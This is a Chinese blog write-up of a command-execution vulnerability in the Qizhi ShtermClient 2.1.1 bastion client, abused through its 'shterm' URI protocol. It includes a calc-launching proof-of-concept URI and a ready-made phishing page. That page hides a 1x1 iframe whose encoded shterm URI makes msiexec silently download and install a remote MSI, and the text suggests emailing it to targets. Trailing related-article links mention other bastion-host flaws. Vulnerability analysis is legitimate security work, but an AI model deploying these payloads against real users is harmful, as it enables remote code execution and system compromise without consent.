齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
一、基本信息
参考:https://www.cnvd.org.cn/flaw/show/1559039
补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。
二、漏洞挖掘过程
这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。
1、挖掘过程
首先,在安装齐治运维堡垒机客户端软件ShtermClient后,会在计算机上注册一个伪协议“shterm”。堡垒机正是通过该协议,调用本地程序打开了连接到堡垒机的通道。如下图是chrome浏览器打开链接时的提示。
我们可以在注册表中找到它,Command子项指明了如何处理shterm协议的URI。
通过对该过程的抓包分析,发现将”app”:”mstsc”改为”app”:”calc”,生成的shterm URI即可打开本地的计算器。一度认为命令只能注入app参数,后来使用Procmon.exe监控LoadShell.exe的执行,发现会在%tmp%目录下生成一些日志文件,通过分析日志文件以及多次测试,得到了最终可行的利用方案。
Client/inflate.php源代码,可见服务端仅是将提交的数据,先进行压缩,在进行base64编码后即输出。
2、漏洞验证
如果你使用了存在漏洞的shtermclient,在浏览器中打开以下链接,将会在本机打开计算器calc.exe。
shterm://eJyrVkosKFCyUkpOzElWqgUAIf8Ejw==
三、漏洞利用
1、搭建测试环境
首先在靶机上安装ShtermClient-2.1.1。
然后,在kali上搭建PHP环境,以便生成shterm URI,见下图。
在靶机的浏览器中打开链接,即可弹出计算器。
2、Exploit
如下图,提交该POST请求,生成的shterm URI将会执行命令:
msiexec.exe /q /n /i https://github.com/Yasushi/putty/archive/master.msi
然后,把shterm URI放入iframe中,将该html页面的地址通过邮件或者你能想到的其他途径发给目标用户,即可达到不可告人的目的。
<html>
<head>
<meta charset="utf-8" />
<title>demo</title></head>
<body>
<h1>demo</h1>
<h1>齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)</h1>
<br><h1>Hacked by StudyCat</h1>
<iframe width="1" height="1" src="shterm://eJx1T8tqwzAQ/BWz5yC0tuu4uvWWQyAuDTm2yI9i48c6kt0klP57VzK4aaFCh5nZ2dndTygvoKBRGCUJbKCsPdsmKRNtmViVPsZxHByOGaonSbv96fwsB0RMIva8a+9BKeIHgSl/FUb8XPvss0KGtlhhPo7LQDfODoxf6qkyfWboentbc8KtK7tt/khuniGa7KzLvhms06bftuA1+CeTK/e9TK03ckhb3XLSpqyJ2mVBFnsamokMKLkBdjlZslwVKxx/oO7WI7U/stBdweSj4gAIBQoXOZvufltM4esbMSFnCg=="></iframe>
</body>
</html>
转载请注明出处。
转载于:https://www.cnblogs.com/StudyCat/p/11201725.html
齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析相关推荐
- 安恒堡垒机使用手册_齐治堡垒机简易使用手册
================ 精选公文范文, 管理类, 工作总结类, 工作计划类文档, 欢迎阅读下载 ============== -------------------- 精选公文范文,管理类, ...
- mysql堡垒机漏洞_关于近期网传齐治堡垒机漏洞的声明
尊敬的用户: 齐治科技(下述简称"齐治")注意到近期有消息称"齐治堡垒机存在未修复的前台远程代码执行漏洞".经过确认,消息提及的漏洞是齐治已停售产品Shterm ...
- 齐治堡垒机配置文件服务器,齐治堡垒机操作手册-20210703081118.docx-原创力文档
Copyright ? 2009-2011 Copyright ? 2009-2011 齐治科技Page PAGE # 齐治堡垒机操作手册 中国旅游集团 信息共享中心 2020年2月 版本 TOC \ ...
- mysql堡垒机漏洞_绿盟UTS绕过登录/齐治堡垒机 rce
1.绿盟UTS绕过登录 随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录 直接请求接口:/webapi/v1/syst ...
- 齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)分析
一.基本信息 漏洞公告:https://www.cnvd.org.cn/flaw/show/1632201 补丁信息:该漏洞的修复补丁已发布,如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具 ...
- 齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析
基本信息 引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294 补丁信息:该漏洞的修复补丁已于2019年6月25日发布.如果客户尚未修复该补丁,可联 ...
- 齐治堡垒机某版本任意用户登录漏洞复现
漏洞点 /audit/gui_detail_view.php poc /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97)) ...
- 齐治堡垒机_任意用户登录漏洞
fofa查询语法 app="齐治科技-堡垒机" 漏洞复现 漏洞POC为 http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token ...
- 齐治堡垒机任意用户登录漏洞
声明:仅供漏洞检测和学习,勿用于非法测试 漏洞信息 浙江齐治科技股份有限公司是一家主要经营计算机软硬件.网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞, ...
最新文章
- 无线路由器与无线AP的区别
- pymysql的使用心得(1)------小细节,注意!
- 年轻代频繁ParNew GC,导致http服务rt飙高
- Android混淆解析
- 汇编语言--可屏蔽中断
- VTK:可视化之QuadricVisualization
- (转)Cairngorm初学者入门教程 第三节--从使用Model Locator开始学起Cairngorm
- hadoop MultipleInputs fails with ClassCastException (get fileName)
- 区块如何防篡改_深入浅出:一条数据是如何完成上链的
- 查看占用指定端口的程序
- 大幅减少GPU显存占用:可逆残差网络(The Reversible Residual Network)
- 剑指offer:对称的二叉树(镜像,递归,非递归DFS栈+BFS队列)
- 天梯赛 L2-011. (二叉树) 玩转二叉树
- [luoguP3606] [USACO17JAN]Building a Tall Barn建谷仓(贪心 + 线段树)
- 自定义ContentProvider
- 自然语言处理----词干提取器
- 糙哥出版本,脸都不去洗
- TFT-液晶显示屏的结构和原理
- Android 11.0 12.0修改搜狗为默认输入法,并且授予运行权限
- MySQL基础之二 | 详解(SQL-DDL)